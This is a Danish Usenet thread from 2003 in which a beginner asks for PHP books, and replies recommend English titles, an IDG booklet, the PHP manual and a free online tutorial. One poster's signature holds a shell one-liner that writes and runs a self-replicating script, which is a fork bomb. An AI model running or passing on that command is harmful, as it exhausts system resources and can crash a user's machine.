Gode PHP bøger
Fra : jokum snusk

Dato : 23-03-03 12:19

Hej Gruppe

Jeg ville lige høre om der er nogen af jer der kan anbefale nogle gode bøger
til den absolutte nybegynder ?

Findes der PHP bøger af en rimelig kvalitet på dansk ?

På forhånd tak
Og ha det godt

--
--- JS ---

Fra : {Sandvik}

Dato : 23-03-03 12:24

De bedste ...og billigste er på engelsk:
1) Proffessional PHP programming
2) PHP and MySql web Development

/sandvik

Fra : Michal

Dato : 23-03-03 13:20

In news:b5k56k$1afa$1@news.cybercity.dk,
> [...]

> gode bøger til den absolutte nybegynder ?
>
> Findes der PHP bøger af en rimelig kvalitet på dansk ?

IDG tror jeg vist de hedder, har udgivet et tyndt hæfte om PHP for ca. 40
kr.

Det er mere end rigeligt til at starte ud med, og giver en ganske glimrende
basisviden til PHP.

På et senere stadie kan man så bruge PHP manualen, som jeg mener er enormt
glimrende som opslagsværk, og ovenikøbet til emner man ikke ved hvad man
skal gøre med...

http://www.php.net/manual/en/

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Alexandar [4200]

Dato : 23-03-03 13:21

> IDG tror jeg vist de hedder, har udgivet et tyndt hæfte om PHP for ca. 40
> kr.
Hæftet som henvises til er nedenstående, som er direkte citeret fra
www.gad.dk.
Mvh Alexandar

"Start på PHP"

Forfatter: Thomas G. Kristensen. Forlag: IDG Forlag.
Dette hæfte lærer dig at lave spændende og dynamiske websider med PHP, der
er et programmeringssprog til webservere. Gennem de mange øvelser og
eksempler lærer du at lave dine egne PHP-scripts. Hæftet starter med nogle
grundlæggende scripts og går hurtigt videre til de mere avancerede og
udfordrende scripts. Du lærer bl.a. at indsætte PHP-scripts i HTML-kode,
arbejde med løkker og betingelser, oprette funktioner og bearbejde
brugerinput. Hæftet henvender sig til læsere, der ønsker en hurtig og
letforståelig introduktion til PHP.

Fra : Demos

Dato : 23-03-03 14:34

Michal <nonexistant@fakedomain.INVALID> wrote:

> IDG tror jeg vist de hedder, har udgivet et tyndt hæfte om PHP for
> ca. 40 kr.
>
> Det er mere end rigeligt til at starte ud med, og giver en ganske
> glimrende basisviden til PHP.

Efter min mening giver http://www.webcafe.dk/artikler/php/ en lige så god -
og tilmed gratis - introduktion til PHP, hvis man kan se bort fra at
artiklerne ikke er brand-spanking-new. På den anden side er hæftet heller
ikke helt up-to-date.

Demos